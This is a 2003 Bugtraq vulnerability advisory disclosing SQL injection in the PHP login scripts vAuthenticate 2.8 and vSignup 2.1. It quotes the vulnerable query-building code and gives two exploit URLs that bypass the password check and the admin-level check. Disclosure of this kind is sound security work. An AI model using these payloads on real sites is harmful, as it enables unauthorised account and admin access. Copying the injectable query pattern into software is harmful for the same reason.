[28505] in bugtraq
vSignup, vAuthenticate (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Jan 21 00:55:09 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 14 Jan 2003 17:38:58 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F71h1aQzHkQtMXitvVj00000f38@hotmail.com>
Informations :
°°°°°°°°°°°°°°
-----------------------
Product : vAuthenticate
Version : 2.8
-----------------------
Product : vSignup
Version : 2.1
-----------------------
Website : http://www.beanbug.net
Problem : SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
chgpwd.php :
-----------------------------------------------
<?
if (!class_exists(auth))
{
include ("auth.php");
}
include ("authconfig.php");
include ("check.php");
?>
-----------------------------------------------
admin/index.php :
------------------------------------------
<?
if (!class_exists(auth))
{
include ("../auth.php");
}
include ("../authconfig.php");
include ("../check.php");
if ($check["level"] != 1)
{
------------------------------------------
check.php :
------------------------------------------------------------------------
<?
$CheckSecurity = new auth();
$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
if ($check == false)
{
// Feel free to change the error message below. Just make sure you put a
"\" before
// any double quote.
print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\"
color=\"#FF0000\">";
print "<b>Illegal Access</b>";
print "</font><br>";
print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\"
color=\"#000000\">";
print "<b>You do not have permission to view this page.</b></font>";
exit; // End program execution. This will disable continuation of
processing the rest of the page.
}
?>
------------------------------------------------------------------------
auth.php :
------------------------------------------------------------------------
function page_check($username, $password) {
$query = "SELECT * FROM authuser WHERE uname='$username' AND
passwd='$password' AND status <> 'inactive'";
$connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);
// OLD CODE - DO NOT REMOVE
// $result = mysql_db_query($this->DBNAME, $query);
// REVISED CODE
$SelectedDB = mysql_select_db($this->DBNAME);
$result = mysql_query($query);
$numrows = mysql_num_rows($result);
$row = mysql_fetch_array($result);
// CHECK IF THERE ARE RESULTS
// Logic: If the number of rows of the resulting recordset is 0, that means
that no
// match was found. Meaning, wrong username-password combination.
if ($numrows == 0) {
return false;
}
else {
return $row;
}
} // End: function page_check
------------------------------------------------------------------------
Exploits :
°°°°°°°°°°
http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1
Patchs :
°°°°°°°°
A patch can be found on http://www.phpsecure.org.
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
